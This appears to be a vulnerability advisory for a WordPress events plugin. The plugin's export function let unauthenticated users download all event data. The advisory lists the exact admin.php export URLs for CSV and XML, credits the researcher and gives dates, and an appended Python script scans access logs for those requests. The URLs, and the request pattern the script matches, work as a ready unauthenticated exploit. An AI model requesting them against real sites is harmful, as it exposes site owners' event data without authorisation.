The plugin did not properly restrict access to the export files, allowing unauthenticated users to export all event data, for example in CSV or XML format.
https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
khanh
Yes
2021-01-29 (about 2 years ago)
2021-01-29 (about 2 years ago)
2021-01-31 (about 2 years ago)
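
Added example (not part of the original advisory or the plugin's code): a Python check that scans web server access logs for requests to the export action in the URLs listed above, so a site owner can see whether the endpoint was requested and answered. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined access-log prefix: ip, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2021:10:00:01 +0000] "GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1" 200 48213 "-" "curl/7.68.0"',
    '198.51.100.7 - - [29/Jan/2021:10:02:13 +0000] "GET /wp-admin/admin.php?mec-ix-action=export%2Devents&format=xml&page=MEC-ix HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Jan/2021:10:03:40 +0000] "GET /wp-admin/admin.php?page=MEC-settings HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Jan/2021:10:04:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def find_mec_export_requests(lines):
    """Return requests that hit the export action named in the advisory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes, so encoded or reordered parameters still match.
        q = {k: v[-1] for k, v in parse_qs(url.query).items()}
        if q.get("page") != "MEC-ix" or q.get("mec-ix-action") != "export-events":
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "format": q.get("format", ""),
            "status": status,
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            # 200 means the server answered the export request with a body.
            "served": status == 200,
        })
    return hits

if __name__ == "__main__":
    for hit in find_mec_export_requests(SAMPLE_LOG):
        print(hit)
```

Access logs in this format do not record session cookies, so each hit marked as served still has to be correlated with known administrator activity to decide whether it was unauthenticated.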